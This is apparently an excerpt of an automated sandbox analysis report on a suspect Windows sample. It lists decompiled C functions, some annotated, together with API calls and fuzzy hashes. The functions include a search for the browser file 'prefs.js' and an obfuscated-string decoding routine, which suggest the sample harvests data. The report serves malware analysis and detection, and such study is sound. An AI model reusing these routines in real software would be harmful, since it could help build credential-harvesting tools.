                                                                                                                                                                        									E0040D7C1(_t44, _t42, __eflags,  &_v652);
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_a8 = _a8 + 1;
                                                                                                                                                                        						E0040D9D8(_t44, _t42, __eflags,  &_v652, _a8);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				E004070C5( &_v1300);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}













Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strlen$FileFindFirst
• String ID: *.*$prefs.js
• API String ID: 2516927864-1592826420
• Opcode ID: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
• Instruction ID: 0a1894bf97bc7f37e7ea977f35cd1e9cdc16bb9bd7797736beedadfbd1967f85
• Opcode Fuzzy Hash: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
• Instruction Fuzzy Hash: 1811947250C3465ED720EAA58C01ADB7BD89F55314F14863FF898E21C2D738D61DCB9A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004066AF(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileNameSavestrcpy
• String ID: L
• API String ID: 1182090483-2909332022
• Opcode ID: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
• Instruction ID: d41a0f3581961b0f058ab7b38d8a0fc10f69f88ca1386dcb34cd33e007bc3755
• Opcode Fuzzy Hash: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
• Instruction Fuzzy Hash: D301E9B1D102099FDF10DFA9D8847AEBBF4BF08319F10442AE915E6340DB749955CF54
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadMenuA.USER32 ref: 00407D2B
• sprintf.MSVCRT ref: 00407D4E
  • Part of subcall function 00407BCE: GetMenuItemCount.USER32 ref: 00407BE4
  • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C08
  • Part of subcall function 00407BCE: GetMenuItemInfoA.USER32 ref: 00407C3E
  • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C6B
                                                                                                                                                                          • Part of subcall function 00407BCE: strchr.MSVCRT ref: 00407C77
                                                                                                                                                                          • Part of subcall function 00407BCE: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407CD2
                                                                                                                                                                          • Part of subcall function 00407BCE: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407CEE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
• String ID: menu_%d
• API String ID: 3671758413-2417748251
• Opcode ID: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
• Instruction ID: 2770b7a066d609e077f5412e4a2b93c9a9718e974603bd13de201155b170d4e3
• Opcode Fuzzy Hash: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
• Instruction Fuzzy Hash: 25D0C271A4911036CB2133366C0AFDB3C288BD2719F28406EF000650C1CABCA182827E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
	E004084B2(char* __esi) {
		char* _t2;
		char* _t6;

		_t6 = __esi;
		/* Subcall 0040616A fills the buffer via GetModuleFileNameA (see APIs below),
		   so __esi receives the running module's own path. */
		E0040616A(__esi);
		/* Locate the last '.' (0x2e) and cut the extension off in place. */
		_t2 = strrchr(__esi, 0x2e);
		if(_t2 != 0) {
			 *_t2 = 0;
		}
		/* Append "_lng.ini": the result is a config file name derived from the module path. */
		return strcat(_t6, "_lng.ini");
	}
APIs
  • Part of subcall function 0040616A: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,004084B8,00000000,004083D6,?,00000000,00000104,?), ref: 00406175
• strrchr.MSVCRT ref: 004084BB
• strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 004084D0
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileModuleNamestrcatstrrchr
• String ID: _lng.ini
• API String ID: 3097366151-1948609170
• Opcode ID: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
• Instruction ID: 42c27a01d44ad3a484ea9941e8a753782f6a4a1a49f0a0828630b4f1254f47e7
• Opcode Fuzzy Hash: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
• Instruction Fuzzy Hash: 98C0126924565024D12621215E03B8A09494F26319F24416BF501781C3EE9C46E1806E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
	E00407570(char* __eax, intOrPtr* _a4, intOrPtr _a8) {
		signed int _v8;
		int _v12;
		char* _v16;
		char _v20;
		signed int* _v24;
		char _v28;
		void _v284;
		char _v540;
		char _v1068;
		void _v3115;
		char _v3116;
		void* __ebx;
		void* __edi;
		void* __esi;
		signed int _t35;
		signed int _t36;
		signed int _t40;
		signed int* _t61;
		char _t69;
		char* _t74;
		char* _t75;
		intOrPtr* _t76;
		signed int _t78;
		int _t80;
		void* _t83;
		void* _t84;
		signed int _t89;

		_t74 = __eax;
		/* Input is a text-encoded blob; its length must be even and longer than 0x20. */
		_t35 = strlen(__eax);
		_t78 = _t35;
		_t36 = _t35 & 0x80000001;
		if(_t36 < 0) {
			_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
			_t89 = _t36;
		}
		if(_t89 != 0 || _t78 <= 0x20) {
			return _t36;
		} else {
			/* Zero a 0x800-byte output buffer (_v3116) that receives the decoded bytes. */
			_v3116 = 0;
			memset( &_v3115, 0, 0x7ff);
			_v8 = _v8 & 0x00000000;
			/* Initial decode key is taken from the second field of the _a4 object, forced odd. */
			_t61 = _a4 + 4;
			_t40 =  *_t61 | 0x00000001;
			if(_t78 <= 4) {
				L7:
				_t79 =  &_v1068;
				/* E004046E1 / E004047AA / E0040481B / E004047FB are subcalls not shown in this
				   excerpt; _v20/_v16 and _v28/_v24 are laid out as {size, pointer} pairs
				   (assumption from the decompiled layout, not confirmed by the report). */
				E004046E1( &_v1068);
				if(E004047AA( &_v1068, _t93) != 0) {
					_v20 = _v8;
					_v16 =  &_v3116;
					_v28 = 0x10;
					_v24 = _t61;
					if(E0040481B(_t79,  &_v20,  &_v28,  &_v12) != 0) {
						/* Copy at most 0xff bytes of the result into a local, NUL-terminate it,
						   hand it to the caller's callback through _a4, then free the buffer. */
						_t80 = _v12;
						if(_t80 > 0xff) {
							_t80 = 0xff;
						}
						_v540 = 0;
						_v284 = 0;
						memcpy( &_v284, _v8, _t80);
						_t75 =  &_v540;
						 *((char*)(_t84 + _t80 - 0x118)) = 0;
						E004060DA(0xff, _t75, _a8);
						 *((intOrPtr*)( *_a4))(_t75);
						LocalFree(_v8);
					}
				}
				return E004047FB( &_v1068);
			}
			/* Decode loop: starting at offset 5, each pair of input characters yields one
			   output byte ((c[i-1]-1) << 4 | (c[i]-0x21)) minus a rolling key that is
			   multiplied by 0x10ff5 after every byte. */
			_t76 = _t74 + 5;
			_t83 = (_t78 + 0xfffffffb >> 1) + 1;
			do {
				_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
				_t40 = _t40 * 0x10ff5;
				_t76 = _t76 + 2;
				_v8 = _v8 + 1;
				_t83 = _t83 - 1;
				_t93 = _t83;
				 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
			} while (_t83 != 0);
			goto L7;
		}
	}































APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• API String ID: 3110682361-0
• Opcode ID: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
• Instruction ID: a7b320da169f7f969887caa54c031871a44602910a4795043d90d4c59a740d9e
• Opcode Fuzzy Hash: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
• Instruction Fuzzy Hash: B0312972D0011D9BDB10DB68CC81BDEBBB8EF45318F1006B6E545B3281DA79AE858B95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
E00408638(intOrPtr* __esi, void* __eflags) {
	intOrPtr* _t22;
	intOrPtr* _t31;

	_t31 = __esi;
	 *__esi = 0x414350;
	_t22 = E00406578(0x1c8, __esi);
	_push(0x14);
	L00412090();
	if(_t22 == 0) {
		_t22 = 0;
	} else {
		 *((intOrPtr*)(_t22 + 0xc)) = 0;
		 *_t22 = 0;
		 *((intOrPtr*)(_t22 + 4)) = 0;
		 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
		 *((intOrPtr*)(_t22 + 8)) = 0;
	}
	_push(0x14);
	 *((intOrPtr*)(_t31 + 4)) = _t22;
	L00412090();
	if(_t22 == 0) {
		_t22 = 0;
	} else {
		 *((intOrPtr*)(_t22 + 0xc)) = 0;
		 *_t22 = 0;
		 *((intOrPtr*)(_t22 + 4)) = 0;
		 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
		 *((intOrPtr*)(_t22 + 8)) = 0;
	}
	_push(0x14);
	 *((intOrPtr*)(_t31 + 8)) = _t22;
	L00412090();
	if(_t22 == 0) {
		_t22 = 0;
	} else {
		 *((intOrPtr*)(_t22 + 0xc)) = 0;
		 *_t22 = 0;
		 *((intOrPtr*)(_t22 + 4)) = 0;
		 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
		 *((intOrPtr*)(_t22 + 8)) = 0;
	}
	_push(0x14);
	 *((intOrPtr*)(_t31 + 0xc)) = _t22;
	L00412090();
	if(_t22 == 0) {
		_t22 = 0;
	} else {
		 *((intOrPtr*)(_t22 + 0xc)) = 0;
		 *_t22 = 0;
		 *((intOrPtr*)(_t22 + 4)) = 0;
		 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
		 *((intOrPtr*)(_t22 + 8)) = 0;
	}
	 *((intOrPtr*)(_t31 + 0x10)) = _t22;
	return _t31;
}


APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 57e6dba8ab03ca08e411dffe9121cf345b91e8e4000f6b536eec088db062ac75
• Instruction ID: a93534bcf4590af08eae181cf0f7bc47295f2e33990000f3cf4a50e67893865e
• Opcode Fuzzy Hash: 57e6dba8ab03ca08e411dffe9121cf345b91e8e4000f6b536eec088db062ac75
• Instruction Fuzzy Hash: 8421E7B0A003008ED7519F2A9645A55FBE4FF9431072AC9AFD259CB3B2DBF9C880DB14
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			#include <stdlib.h>
			#include <string.h>

			typedef int intOrPtr;   /* decompiler type: an integer- or pointer-sized value */

			/* Buffer-grow helper (subcall 00406104, which the API list shows calling malloc,
			   memcpy and free). Its body is not part of this listing; the declaration is
			   inferred from the two call sites below. */
			void E00406104(void* obj, intOrPtr newsize, void** buf, int elemsize, intOrPtr capacity);

			/* Appends the NUL-terminated string _a4 to a growable string table at __eax
			   and records the string's byte offset in a 4-byte-per-entry offset array.
			   Field offsets used below: +0x04 bytes used in the string pool, +0x10 pool
			   buffer, +0x14 pool capacity, +0x0c offset array, +0x18 array capacity,
			   +0x1c entry count. Returns the index of the entry just added. */
			int E00406AA3(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t25;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				intOrPtr _t53;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);                          /* length of the new string */
				_t42 =  *((intOrPtr*)(_t59 + 4));            /* pool bytes used: offset of the new string */
				_t52 = _t42 + _t27 + 1;                      /* new used size, including the NUL */
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));         /* pool capacity */
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;                          /* &pool buffer */
				if(_t52 != 0xffffffff) {
					E00406104(_t59, _t52, _t55, 1, _t28);    /* grow the byte pool */
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);                      /* entry count: index of the new entry */
				_t31 =  *((intOrPtr*)(_t59 + 0x18));         /* offset array capacity */
				_t56 = _t59 + 0xc;                           /* &offset array */
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E00406104(_t59 + 8, _t53, _t56, 4, _t31); /* grow the 4-byte offset array */
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);    /* copy the string into the pool */
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;  /* record its offset */
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}

APIs
• strlen.MSVCRT ref: 00406AAF
• free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406ACF
  • Part of subcall function 00406104: malloc.MSVCRT ref: 00406120
  • Part of subcall function 00406104: memcpy.MSVCRT ref: 00406138
  • Part of subcall function 00406104: free.MSVCRT(00000000,00000000,73B74DE0,00406B78,00000001,?,00000000,73B74DE0,00406EF2,00000000,?,?), ref: 00406141
• free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406AF2
• memcpy.MSVCRT ref: 00406B12
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
• Opcode ID: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
• Instruction ID: b9d8f5a2f56f362531d37561c783707772d91941aea6ec8fb4057fc73eb697f3
• Opcode Fuzzy Hash: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
• Instruction Fuzzy Hash: A7119D72200600EFD730EF18D88199AB7F5EF48324B108A2EF556A7692C7B5FD25CB54
Uniqueness

Uniqueness Score: -1.00%